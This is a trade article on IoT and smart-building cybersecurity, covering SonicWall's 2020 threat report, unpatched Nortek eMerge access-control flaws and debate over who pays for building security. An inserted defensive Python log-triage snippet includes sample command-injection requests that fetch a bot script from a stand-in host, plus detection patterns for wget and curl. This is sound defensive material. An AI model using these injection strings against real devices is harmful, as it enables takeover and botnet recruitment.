“The boundaries of your digital empire are limitless. What was once a finite and defendable space is now a boundless territory — a vast, sprawling footprint of devices, apps, appliances, servers, networks, clouds, and users,” says Bill Conner, president and CEO of cybersecurity solution provider SonicWall, on the changing landscape of cybersecurity in buildings.
“For the cybercriminals, it’s more lawless than ever. Despite the best intentions of government agencies, law enforcement, and oversight groups, the current cyber threat landscape is more agile than ever before,” Conner continues. “To survive, you have to be faster, smarter and more decisive. And that’s not easy to do alone — even for larger organizations with substantial cybersecurity budgets.”
SonicWall recently released its 2020 Cyber Threat Report that tracks the volume and style of cyberattacks around the world. While they found a decrease in traditional ransomware and malware attacks in 2019, down 6% from 2018, they also saw a marked increase in intrusion attempts, encrypted threats, web app attacks, and IoT malware. Overall, there has been a general trend away from “untargeted salvos” by cybercriminals in favor of more evasive attacks against “softer” targets — such as IoT malware against our connected smart building devices.
“In 2019, SonicWall Capture Labs threat researchers discovered a moderate 5% increase in IoT malware, with total volume reaching 34.3 million attacks. But with a deluge of new IoT devices connecting each day, increases in IoT malware attacks should not only be expected, but planned for,” reads the new SonicWall report. “Given the tenuous landscape regarding data privacy, and the fact that everything from nanny cams to doorbells are connected, IoT focused attacks will only increase in 2020 and beyond.”
In May 2019, 10 vulnerabilities were exposed in smart door/building access control systems made by Nortek Security & Control (NSC) by whitehat cybersecurity advisory Applied Risk. The vulnerabilities included cross-site scripting, command injection, weak default hard-coded credentials, privilege escalation, authorization bypass, request forgery, directory traversal, stack-based buffer overflow, and root access over SSH. Ultimately, this meant that hackers could take control of vulnerable systems to launch Distributed Denial of Service (DDoS) attacks.
A DDoS attack uses a network of infected devices, known as a “botnet,” that are synchronized to barrage a specific server with a massive amount of traffic until it collapses under the strain. Most of the hackers targeting NSC systems focused on the Linear eMerge E3 platform, and the most prominent exploitation method involved command injection, where hackers execute commands remotely via specially crafted HTTP requests. This process eventually results in the download of malware that can turn the target machine into a DDoS bot.
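As an added illustration (not code from the article, Applied Risk, or NSC), the following Python triages web-access log lines from a building access controller for the chain described above: a command-injection attempt in an HTTP request followed by a payload download. The log lines, paths and addresses are constructed for the example and are not real eMerge logs or endpoints.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format) for a
# hypothetical building access controller. Not real eMerge traffic.
SAMPLE_LOG = """\
10.0.5.20 - - [12/Feb/2020:08:14:02 +0000] "GET /login.php HTTP/1.1" 200 1532
10.0.5.21 - - [12/Feb/2020:08:14:09 +0000] "POST /card/update HTTP/1.1" 200 88
198.51.100.7 - - [12/Feb/2020:08:15:33 +0000] "GET /status.php?host=127.0.0.1%3Bwget+http%3A%2F%2F203.0.113.9%2Fbot.sh HTTP/1.1" 200 47
198.51.100.7 - - [12/Feb/2020:08:15:40 +0000] "GET /status.php?host=127.0.0.1%7C%7Ccurl+203.0.113.9%2Fbot.sh HTTP/1.1" 200 47
10.0.5.22 - - [12/Feb/2020:08:16:01 +0000] "GET /doors.php?id=12 HTTP/1.1" 200 410
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Shell metacharacters used to chain an injected command onto a parameter.
SHELL_META = re.compile(r'[;|&`$()]')
# Fetch tools typical of the "download a payload" stage of an IoT bot infection.
DOWNLOADER = re.compile(r'\b(wget|curl|tftp|chmod)\b')

def analyze_line(line):
    """Parse one log line; return a finding dict or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group('target'))   # attackers URL-encode metacharacters
    path, _, query = decoded.partition('?')
    meta = bool(SHELL_META.search(query))
    fetch = bool(DOWNLOADER.search(query))
    if meta and fetch:
        severity = 'high'      # injection plus download: likely bot staging
    elif meta or fetch:
        severity = 'medium'    # one indicator alone: review manually
    else:
        severity = None
    return {'ip': m.group('ip'), 'path': path, 'query': query,
            'severity': severity}

def triage(log_text):
    """Group suspicious requests by source IP for follow-up (block, isolate)."""
    findings = {}
    for line in log_text.splitlines():
        r = analyze_line(line)
        if r and r['severity']:
            findings.setdefault(r['ip'], []).append(r)
    return findings
```

Run against a real controller's access log, hits from outside the management network are the ones to isolate first; the patterns are deliberately narrow, so tune them to the device's legitimate parameter values to avoid false positives.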
Six of the 10 vulnerabilities that were discovered by Applied Risk in May 2019 were classified as “highly critical” (9.8 or 10 out of a maximum of 10), but NSC still chose to ignore the security advisory. Six months later, last November, Applied Risk released a proof of concept, giving hackers everything they need to hijack these systems. This means the 2,375 active eMerge systems, based in over 100 countries around the world, have been highly vulnerable since. The vulnerabilities not only enable DDoS attacks but also serve as entry points for deeper infiltration into the corporate network, and all because of the OEM’s failures.
“For as long as Nortek Security and Control insists on ignoring the problems and choosing not to issue a fixing patch for the eMerge, the firms that deploy these systems should take them offline immediately. If that’s impossible, admins are advised to set up a strict firewall or a VPN to limit the access of hackers to the vulnerable terminals,” says Bill Toulas, writing for TechNadu. “Since the NSC hasn’t made an official statement about this, it is unknown when and even if they are planning to fix the 10 flaws that are still plaguing eMerge.”
The NSC access control vulnerabilities, and similar OEM failures, highlight some of the issues facing the development of cybersecurity for the IoT, but that is by no means the end of the story. While it would be great if all products left the manufacturing facility with a high level of security, those products are then purchased, installed, maintained, and operated by various parties that could identify or rectify the security flaw. Slowly but surely, the responsibility for cybersecurity is filtering through an industry that is beginning to understand its role in protecting its buildings.
“I think there has been quite an awakening. Last year people were very interested in the cybersecurity topic, now they are really engaged in actionable items, trying to figure out the product management strategies on the OEM side and building owners are trying to figure out what it means to their organizations. Security is a very large and open question, people don’t know where to start,” said Jim Lee, founder & CEO of Cimetrics during a Memoori webinar last week.
As our physical environments become digital spaces full of connected devices, the opportunity for such attacks continues to grow. Blame is often placed on the OEM, but smart buildings must also step up their cybersecurity game if they are to protect themselves from attack or prevent their devices being used as ammunition for attacks against others. Yet, in most buildings, there is no clear plan, budget, or line of responsibility to follow up on cybersecurity issues. Cybersecurity does not come preinstalled; it is a process that must be monitored, managed, and invested in continuously.
“As cybersecurity is a process, not a project or a product, it cannot be financed in the same way we build buildings, where everything is contemplated as a capital asset upfront, and not another penny is spent over the lifecycle,” Lee continued during the webinar. “IT changes at three-year intervals and buildings change at 30-year intervals, so the question is ‘who has the budget to pay for ongoing security?’ There is a thought process that leads to IT paying for that but we haven’t made that jump into hyperspace where IT has the budgets to pay for that kind of thing.”
Among other building security issues, the cybersecurity webinar discussed who is going to pay for and manage cybersecurity and what that means. It highlighted that IT departments may manage the networks, but they are often not financially equipped to protect buildings from these kinds of attacks. Facilities management organizations handle the various devices being targeted but lack cyber expertise. Considering the ongoing nature of cyberthreats, many in the industry believe that the responsibility for cybersecurity should ultimately fall to the building owner.
“When thinking about who owns this thing and who should be at the top of the pyramid, it really has to be the building owner ultimately,” said Steve Fey, CEO of Totem Building Cybersecurity. “It is important that the owner assumes overall responsibility for cybersecurity, particularly when you get into respond and recover. If they haven’t thought through the cybersecurity policies and procedures then they will be caught unprepared when the event occurs and no one will look good in that process. So we encourage that the owners assume the role of the accountable party in this effort.”
The smart building is a digital entity and must have a strong focus on cybersecurity. The smart building owner is ultimately responsible for the protection of that digital space. As buildings evolve so must their owners, be that for accuracy of data collection and use, occupant health and safety, or cybersecurity. Unless someone takes responsibility for protecting building systems from cyberattacks, everyone will look to the owner for answers when that inevitable hack happens. It is up to the owner to make cybersecurity a priority and a team effort.
“The challenge with cyber is that it is multifaceted and it affects the entire chain of parties that make up a building. It starts with the owner, it moves into facilities organization, and you have the manufacturers who provide the various systems. Most importantly it has to involve the contractors who provide, install, and service these systems,” Fey said during last week’s webinar. “Our industry is at the beginning of this journey. We are now waking up to the fact that these systems are being hacked more and more, raising a fundamental question of who owns the problem. The simple answer to that is that we all have a part to play.”